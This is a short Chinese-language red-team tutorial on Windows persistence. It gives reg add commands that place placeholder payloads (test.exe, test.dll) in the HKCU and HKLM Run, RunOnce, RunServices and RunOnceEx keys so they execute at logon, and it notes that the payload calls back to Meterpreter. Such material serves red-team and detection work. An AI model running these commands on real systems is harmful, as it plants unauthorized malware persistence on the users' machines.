在红队行动期间在网络中获得初步立足点是一项耗时的任务。因此，持久化是红队行动成功的关键，因为这将使团队能够专注于交战目标，而不会失去与指挥和控制服务器的通信。

创建将在 Windows 登录期间执行任意负载的注册表项是红队剧本中最古老的隐藏技巧之一。这种持久性技术需要创建注册表运行键。各种威胁参与者和已知工具（例如 Metasploit、Empire 和 SharPersist）提供了此功能，因此成熟的 SOC 团队将能够检测到此恶意活动。

终端

可以从终端将注册表项添加到运行项以实现持久性。这些注册表值将包含对用户登录时将执行的实际有效负载的引用。已知以下注册表位置被使用这种持久性方法的威胁参与者和红队使用。

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\Users\test.exe"

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v test /t REG_SZ /d "C:\Users\test.exe"

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v test /t REG_SZ /d "C:\Users\test.exe"

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v test /t REG_SZ /d "C:\Users\test.exe"

选择上面任意一条命令执行之后，一旦用户登录时将自动触发执行。

如果已获得提升的凭据，则最好使用本地计算机注册表位置而不是当前用户，因为每次系统启动时都会执行有效负载，无论用户正在向系统进行身份验证如何。

需要管理员权限

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\tmp\test.exe"

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v test /t REG_SZ /d "C:\tmp\test.exe"

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v test /t REG_SZ /d "C:\tmp\test.exe"

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v test /t REG_SZ /d "C:\tmp\test.exe"

在下次登录期间，将执行有效负载并将其传回 Meterpeter。

Oddvar Moe发现了另外两个注册表位置，可以让红队通过执行任意负载或 DLL 来实现持久性。这些将在登录期间执行，并且需要管理员级别权限。

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v test /t REG_SZ /d "C:\tmp\test.exe"

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v test /t REG_SZ /d "C:\tmp\test.dll"

原创 柠檬赏金猎人

​